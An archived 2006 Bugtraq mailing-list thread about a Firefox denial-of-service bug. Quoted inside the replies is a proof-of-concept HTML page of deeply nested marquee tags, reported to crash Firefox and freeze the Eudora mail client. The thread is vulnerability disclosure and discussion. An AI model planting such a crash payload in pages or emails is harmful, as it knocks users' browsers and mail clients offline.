lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <6.2.1.2.0.20060605091637.0278b6f0@172.16.1.10>
Date: Mon, 05 Jun 2006 09:19:20 +0530
From: Sanjay Rawat <sanjayr@...oto.com>
To: <andy@....uk.com>, "'Josh Zlatin-Amishav'" <josh@...s.co.il>,
	<co296@....com>
Cc: <bugtraq@...urityfocus.com>
Subject: RE: Fire fox dos exploit


I have seen that the exploit also freezes Eudora 6.2.1.2. I was trying to 
open the original mail in Eudora mail client and whenever I clicked on the 
the mail , Eudora stopped responding anymore. I had to restart the application.

regards
-Sanjay Rawat

At 09:52 PM 5/31/2006, Andy wrote:
>Crashed my FF 1.5.0.3 straight away on a fully patched XP Pro Service Pack 2
>
>Andy
>
>-----Original Message-----
>From: Josh Zlatin-Amishav [mailto:josh@...s.co.il]
>Sent: 31 May 2006 16:50
>To: co296@....com
>Cc: bugtraq@...urityfocus.com
>Subject: Re: Fire fox dos exploit
>
>On Tue, 30 May 2006, co296@....com wrote:
>
> > I have found a problem which causes denial of service on fire fox browser
>
>Can you give us some more details, like versions and platforms affected? I
>was unable to
>recreate this flaw using firefox 1.5.dfsg+1.5.0 on Debian unstable.
>
>--
>   - Josh
>
> >
> > Creadit:to n00b for finding this bug..
> >
> > the problem lie's in the
> >
> > <marquee> html tag uses 100% cpu and crash's the browser..
> >
> > Following proof of concept available
> >
> > <html>
> > <head>
> > <title>Credit to n00b..</title>
> > <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
> > </head>
> >
> > <body>
> >
><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><mar
>quee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee
> ><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><ma
>rquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marque
>e><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><m
>arquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marqu
>ee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><
>marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marq
>uee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></
>marquee></marquee></marquee></marquee></marquee></marquee></marquee></marque
>e></marquee></marquee></marquee></marquee></marquee></marquee></marquee></ma
>rquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee>
></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marq
>  ue
> >
>e></marquee></marquee></marquee></marquee></marquee></marquee></marquee></ma
>rquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee>
></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marq
>uee></marquee></marquee></marquee></marquee></marquee></marquee></marquee>
> > </body>
> > </html>
> >
> >



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ